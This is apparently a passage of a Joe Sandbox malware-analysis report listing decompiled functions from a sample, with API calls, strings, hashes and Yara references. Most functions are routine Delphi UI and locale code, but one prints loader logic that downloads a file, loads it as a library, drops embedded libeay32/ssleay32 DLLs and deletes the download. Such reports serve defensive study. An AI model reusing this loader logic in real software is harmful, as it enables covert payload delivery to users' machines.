				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A14(0x49e690, _v36);
				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A14(0x49e694, _v44);
				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
				E00404A14(0x49e69c, _v52);
				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
				E00404A14(0x49e6a0, _v56);
				E004049C0( &_v12);
				E004049C0( &_v16);
				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
				_t104 = E00409664(0x40e5c8, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404A58( &_v8, 0x40e620);
				} else {
					E00404A58( &_v8, 0x40e614);
				}
				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
				_t111 = E00409664(0x40e5c8, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
					if(E00409664(0x40e5c8, 0, _t198) != 0) {
						E00404A58( &_v12, 0x40e63c);
					} else {
						E00404A58( &_v16, 0x40e62c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404D40();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404D40();
				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E5BA);
				return E004049E4( &_v68, 0x10);
			}

























                                                    0x0040e2e8
                                                    0x0040e2e8
                                                    0x0040e2e9
                                                    0x0040e2eb
                                                    0x0040e2f0
                                                    0x0040e2f0
                                                    0x0040e2f2
                                                    0x0040e2f4
                                                    0x0040e2f4
                                                    0x0040e2f7
                                                    0x0040e2fa
                                                    0x0040e2fb
                                                    0x0040e300
                                                    0x0040e303
                                                    0x0040e306
                                                    0x0040e30b
                                                    0x0040e310
                                                    0x0040e317
                                                    0x0040e319
                                                    0x0040e319
                                                    0x0040e323
                                                    0x0040e332
                                                    0x0040e33f
                                                    0x0040e354
                                                    0x0040e363
                                                    0x0040e378
                                                    0x0040e387
                                                    0x0040e39a
                                                    0x0040e3ad
                                                    0x0040e3c2
                                                    0x0040e3d1
                                                    0x0040e3e4
                                                    0x0040e3f9
                                                    0x0040e404
                                                    0x0040e411
                                                    0x0040e426
                                                    0x0040e431
                                                    0x0040e43e
                                                    0x0040e451
                                                    0x0040e466
                                                    0x0040e473
                                                    0x0040e488
                                                    0x0040e495
                                                    0x0040e49d
                                                    0x0040e4a5
                                                    0x0040e4ba
                                                    0x0040e4c4
                                                    0x0040e4c9
                                                    0x0040e4cb
                                                    0x0040e4e4
                                                    0x0040e4cd
                                                    0x0040e4d5
                                                    0x0040e4d5
                                                    0x0040e4f9
                                                    0x0040e503
                                                    0x0040e508
                                                    0x0040e50a
                                                    0x0040e51c
                                                    0x0040e52d
                                                    0x0040e546
                                                    0x0040e52f
                                                    0x0040e537
                                                    0x0040e537
                                                    0x0040e52d
                                                    0x0040e54b
                                                    0x0040e54e
                                                    0x0040e551
                                                    0x0040e556
                                                    0x0040e563
                                                    0x0040e568
                                                    0x0040e56b
                                                    0x0040e56e
                                                    0x0040e573
                                                    0x0040e580
                                                    0x0040e593
                                                    0x0040e59a
                                                    0x0040e59d
                                                    0x0040e5a0
                                                    0x0040e5b2

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                    • API String ID: 4232894706-2493093252
                                                    • Opcode ID: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                    • Opcode Fuzzy Hash: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004388F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00438D40(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x49dbcc; // 0x49ebb8
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E00441704(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x437498; // 0x4374e4
						__eflags = E00403D78( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00441704( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00438884);
						_push(GetCurrentThreadId());
						L004075C8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403DE8(_t101, _t126);
						_t78 =  *0x49eb38; // 0x0
						_t110 =  *0x4360a0; // 0x4360ec
						if(E00403D78(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x49eb38; // 0x0
						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E00441704(_t116);
					goto L19;
				}
				_t117 = E00437E5C(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E00441704(_t117);
					goto L6;
				}
			}































                                                    0x004388f0
                                                    0x004388f9
                                                    0x004388fb
                                                    0x0043890a
                                                    0x0043890c
                                                    0x00438912
                                                    0x00438917
                                                    0x00438922
                                                    0x0043894b
                                                    0x0043894f
                                                    0x00438a7e
                                                    0x00438a87
                                                    0x00438a87
                                                    0x00438955
                                                    0x0043895b
                                                    0x0043895b
                                                    0x00438960
                                                    0x00000000
                                                    0x00000000
                                                    0x00438959
                                                    0x00438959
                                                    0x00438969
                                                    0x0043896b
                                                    0x00438971
                                                    0x00000000
                                                    0x00000000
                                                    0x0043897a
                                                    0x0043897d
                                                    0x00438982
                                                    0x004389a3
                                                    0x004389a6
                                                    0x004389b1
                                                    0x004389b3
                                                    0x004389c5
                                                    0x004389c7
                                                    0x004389b5
                                                    0x004389b8
                                                    0x004389c0
                                                    0x004389c0
                                                    0x004389ca
                                                    0x004389ca
                                                    0x004389ce
                                                    0x004389d4
                                                    0x004389da
                                                    0x004389e0
                                                    0x004389e1
                                                    0x004389eb
                                                    0x004389ec
                                                    0x004389f1
                                                    0x004389f5
                                                    0x00000000
                                                    0x00000000
                                                    0x00438a03
                                                    0x00438a0e
                                                    0x00438a13
                                                    0x00438a23
                                                    0x00438a28
                                                    0x00438a2d
                                                    0x00438a3a
                                                    0x00438a65
                                                    0x00438a78
                                                    0x00438a7a
                                                    0x00438a7a
                                                    0x00000000
                                                    0x00438a78
                                                    0x00438a3c
                                                    0x00438a4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00438a4d
                                                    0x00438a63
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00438a63
                                                    0x00438987
                                                    0x0043898d
                                                    0x0043898d
                                                    0x00438992
                                                    0x00000000
                                                    0x00000000
                                                    0x0043898b
                                                    0x0043898b
                                                    0x0043899b
                                                    0x00000000
                                                    0x0043899b
                                                    0x0043892c
                                                    0x00438930
                                                    0x00000000
                                                    0x00438936
                                                    0x0043893a
                                                    0x0043893a
                                                    0x0043893f
                                                    0x00000000
                                                    0x00000000
                                                    0x00438938
                                                    0x00438938
                                                    0x00438948
                                                    0x00000000
                                                    0x00438948

                                                    APIs
                                                      • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                      • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                    • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                    • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                    • 733AAC10.USER32(00000000,00438884,?,00000000,00000004,?,-0000000C,?), ref: 004389EC
                                                    • GetWindowRect.USER32 ref: 00438A03
                                                    • IntersectRect.USER32 ref: 00438A71
                                                      • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                      • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                      • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                      • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                    • String ID: `C$tC
                                                    • API String ID: 2049660638-2788972245
                                                    • Opcode ID: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                    • Opcode Fuzzy Hash: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A8A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 0045A8B7
                                                    • GetWindowRect.USER32 ref: 0045A911
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                    • MessageBoxA.USER32 ref: 0045A98A
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                    • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Active$MessageRect
                                                    • String ID: (
                                                    • API String ID: 3147912190-3887548279
                                                    • Opcode ID: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                    • Opcode Fuzzy Hash: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042819C(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
					E00425F58();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040275C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00425F58();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00425F58();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x428476);
				return E0040277C(_v16);
			}


























                                                    0x00428301
                                                    0x00428303
                                                    0x0042830c
                                                    0x0042830f
                                                    0x00428312
                                                    0x00428316
                                                    0x00428328
                                                    0x00428332
                                                    0x00428342
                                                    0x00428342
                                                    0x00428347
                                                    0x00428353
                                                    0x00428356
                                                    0x00428364
                                                    0x00428372
                                                    0x0042837c
                                                    0x00428385
                                                    0x00428387
                                                    0x00428387
                                                    0x004283a7
                                                    0x004283c4
                                                    0x004283c7
                                                    0x004283d0
                                                    0x004283d5
                                                    0x004283da
                                                    0x004283f0
                                                    0x004283f2
                                                    0x004283f7
                                                    0x004283f9
                                                    0x004283f9
                                                    0x0042840b
                                                    0x00428410
                                                    0x0042841a
                                                    0x00428420
                                                    0x00428425
                                                    0x0042842c
                                                    0x00428444
                                                    0x00428446
                                                    0x0042844b
                                                    0x0042844d
                                                    0x0042844d
                                                    0x00428452
                                                    0x00428458
                                                    0x0042845b
                                                    0x0042845e
                                                    0x0042846e

                                                    APIs
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                    • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                    • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileMeta$Bits$DeleteHeader
                                                    • String ID: `
                                                    • API String ID: 1990453761-2679148245
                                                    • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                    • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00495084 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E00495084(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t55;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t79;
				struct HINSTANCE__* _t82;
				void* _t84;
				intOrPtr _t87;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(_t87);
				_push(0x4951d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				_t84 = 3;
				_t55 = 0x49f0f4;
				do {
					if( *_t55 == 0) {
						goto L5;
					} else {
						_t68 =  *0x49f100; // 0x0
						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
							_v5 = 0;
							goto L5;
						} else {
							_v5 = 1;
							_t72 =  *0x49f100; // 0x0
							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
							_t82 = LoadLibraryA(E00404E80(_v16));
							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
							_t74 =  *0x49f100; // 0x0
							E00404CCC( &_v20, "\\libeay32.dll", _t74);
							E0041DD9C(_t30, _t56, _v20, _t82);
							E00403BEC(_t56);
							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
							_t77 =  *0x49f100; // 0x0
							E00404CCC( &_v24, "\\ssleay32.dll", _t77);
							E0041DD9C(_t38, _t57, _v24, _t82);
							E00403BEC(_t57);
							FreeLibrary(_t82);
							_t79 =  *0x49f100; // 0x0
							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
							E00404BB8( &_v28, E00404E80(_v32));
							E00409BAC(_v28);
						}
					}
					break;
					L5:
					_t55 = _t55 + 4;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(0x4951db);
				return E004049E4( &_v32, 6);
			}




















                                                    0x00495089
                                                    0x0049508a
                                                    0x0049508b
                                                    0x0049508c
                                                    0x0049508d
                                                    0x0049508e
                                                    0x0049508f
                                                    0x00495090
                                                    0x00495091
                                                    0x00495095
                                                    0x00495096
                                                    0x0049509b
                                                    0x0049509e
                                                    0x004950a1
                                                    0x004950a6
                                                    0x004950ab
                                                    0x004950ae
                                                    0x00000000
                                                    0x004950b4
                                                    0x004950bc
                                                    0x004950c2
                                                    0x004950d3
                                                    0x004951ab
                                                    0x00000000
                                                    0x004950d9
                                                    0x004950d9
                                                    0x004950e5
                                                    0x004950eb
                                                    0x004950fe
                                                    0x00495115
                                                    0x0049511f
                                                    0x00495125
                                                    0x0049512f
                                                    0x00495136
                                                    0x00495150
                                                    0x0049515a
                                                    0x00495160
                                                    0x0049516a
                                                    0x00495171
                                                    0x00495177
                                                    0x00495184
                                                    0x0049518a
                                                    0x0049519c
                                                    0x004951a4
                                                    0x004951a4
                                                    0x004950d3
                                                    0x00000000
                                                    0x004951af
                                                    0x004951af
                                                    0x004951b2
                                                    0x004951b2
                                                    0x004951bb
                                                    0x004951be
                                                    0x004951c1
                                                    0x004951d3

                                                    APIs
                                                      • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                      • Part of subcall function 00474D50: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                      • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                      • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004950F9
                                                    • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                      • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,0049C9B0,00475D16,00000000,00475D3C), ref: 00409BB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                    • String ID: LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                    • API String ID: 1893608559-2695981766
                                                    • Opcode ID: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                    • Opcode Fuzzy Hash: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C82C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                    0x0042c835
                                                    0x0042c838
                                                    0x0042c842
                                                    0x0042c867
                                                    0x0042c86f
                                                    0x0042c88f
                                                    0x0042c894
                                                    0x0042c89f
                                                    0x0042c8aa
                                                    0x0042c8b4
                                                    0x0042c8b5
                                                    0x0042c8b6
                                                    0x0042c8b7
                                                    0x0042c8b8
                                                    0x0042c8b9
                                                    0x0042c8c3
                                                    0x0042c8c5
                                                    0x0042c8cd
                                                    0x0042c8ce
                                                    0x0042c8ce
                                                    0x0042c8d3
                                                    0x0042c8d3
                                                    0x0042c844
                                                    0x0042c856
                                                    0x0042c863
                                                    0x0042c863
                                                    0x0042c8dd

                                                    APIs
                                                    • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                    • GetSystemMetrics.USER32 ref: 0042C899
                                                    • GetSystemMetrics.USER32 ref: 0042C8A4
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfo
                                                    • API String ID: 1539801207-1633989206
                                                    • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
